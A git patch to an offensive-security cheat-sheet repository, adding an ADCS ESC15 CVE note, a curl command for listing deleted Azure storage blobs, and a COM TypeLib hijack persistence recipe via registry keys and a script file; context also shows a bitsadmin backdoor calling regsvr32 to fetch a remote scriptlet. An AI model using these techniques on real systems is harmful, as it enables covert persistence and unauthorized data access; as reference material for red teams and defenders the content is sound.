From ea7e265dac4a3cf01fbaba8981386a2386a26598 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Thu, 14 Nov 2024 13:15:04 +0100 Subject: [PATCH] COM Persistence + EKUwu CVE + Deleted Blobs from Azure Storage --- .../ad-adcs-certificate-services.md | 5 ++- .../azure/azure-services-storage-blob.md | 34 +++++++++++++++ .../persistence/windows-persistence.md | 41 ++++++++++++++++++- 3 files changed, 78 insertions(+), 2 deletions(-) diff --git a/docs/active-directory/ad-adcs-certificate-services.md b/docs/active-directory/ad-adcs-certificate-services.md index 00cd3d0..5e5f626 100644 --- a/docs/active-directory/ad-adcs-certificate-services.md +++ b/docs/active-directory/ad-adcs-certificate-services.md @@ -423,7 +423,10 @@ Members : {} ``` -## ESC15 - EKUwu Application Policies +## ESC15 - EKUwu Application Policies - CVE-2024-49019 + +This technique now has a CVE number and was patched on November 12, See [Active Directory Certificate Services Elevation of Privilege Vulnerability - CVE-2024-49019](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49019) for more information. + **Requirements** diff --git a/docs/cloud/azure/azure-services-storage-blob.md b/docs/cloud/azure/azure-services-storage-blob.md index 31c5647..2e1a77b 100644 --- a/docs/cloud/azure/azure-services-storage-blob.md +++ b/docs/cloud/azure/azure-services-storage-blob.md @@ -17,6 +17,40 @@ Found Storage Account - redacted.blob.core.windows.net ## List and download blobs +Visiting `https://.blob.core.windows.net/?restype=container&comp=list` provides a JSON file containing a complete list of the Azure Blobs. + +```xml + + + + index.html + https://.blob.core.windows.net//index.html + + Fri, 20 Oct 2023 20:08:20 GMT + 0x8DBD1A84E6455C0 + 782359 + text/html + + + JSe+sM+pXGAEFInxDgv4CA== + + BlockBlob + unlocked + + +``` + +Browse deleted files. + +```ps1 +$ curl -s -H "x-ms-version: 2019-12-12" 'https://.blob.core.windows.net/?restype=container&comp=list&include=versions' | xmllint --format - | grep Name + + + index.html + scripts-transfer.zip +``` + + ```powershell PS Az> Get-AzResource PS Az> Get-AzStorageAccount -name -ResourceGroupName diff --git a/docs/redteam/persistence/windows-persistence.md b/docs/redteam/persistence/windows-persistence.md index 0a31a9b..0be010a 100644 --- a/docs/redteam/persistence/windows-persistence.md +++ b/docs/redteam/persistence/windows-persistence.md @@ -242,6 +242,44 @@ bitsadmin /SetNotifyCmdLine backdoor regsvr32.exe "/s /n /u /i:http://10.10.10.1 bitsadmin /resume backdoor ``` + +### COM TypeLib + +* [CICADA8-Research/TypeLibWalker](https://github.com/CICADA8-Research/TypeLibWalker) - TypeLib persistence technique + +Use [sysinternals/procmon](https://learn.microsoft.com/fr-fr/sysinternals/downloads/procmon) to find `RegOpenKey` with the status `NAME NOT FOUND`. The process `explorer.exe` is a good target, as it will spawn your payload every time it is run. + + +```ps1 +Path: HKCU\Software\Classes\TypeLib\{CLSID}\1.1\0\win32 +Path: HKCU\Software\Classes\TypeLib\{CLSID}\1.1\0\win64 +Name: anything +Type: REG_SZ +Value: script:C:\1.sct +``` + +Example of content for `1.sct`. + +```xml + + + + + + +``` + + ## Serviceland ### IIS @@ -622,4 +660,5 @@ Set-DomainObject -Identity -Set @{"ms-mcs-admpwdexpirationtime" * [Beware of the Shadowbunny - Using virtual machines to persist and evade detections - Sep 23, 2020 - wunderwuzzi](https://embracethered.com/blog/posts/2020/shadowbunny-virtual-machine-red-teaming-technique/) * [Persistence via WMI Event Subscription - Elastic Security Solution](https://www.elastic.co/guide/en/security/current/persistence-via-wmi-event-subscription.html) * [PrivEsc: Abusing the Service Control Manager for Stealthy & Persistent LPE - 0xv1n - 2023-02-27](https://0xv1n.github.io/posts/scmanager/) -* [Sc sdset - Microsoft - 08/31/2016](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc742037(v=ws.11)) \ No newline at end of file +* [Sc sdset - Microsoft - 08/31/2016](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc742037(v=ws.11)) +* [Hijack the TypeLib. New COM persistence technique - CICADA8 - October 22, 2024](https://cicada-8.medium.com/hijack-the-typelib-new-com-persistence-technique-32ae1d284661) \ No newline at end of file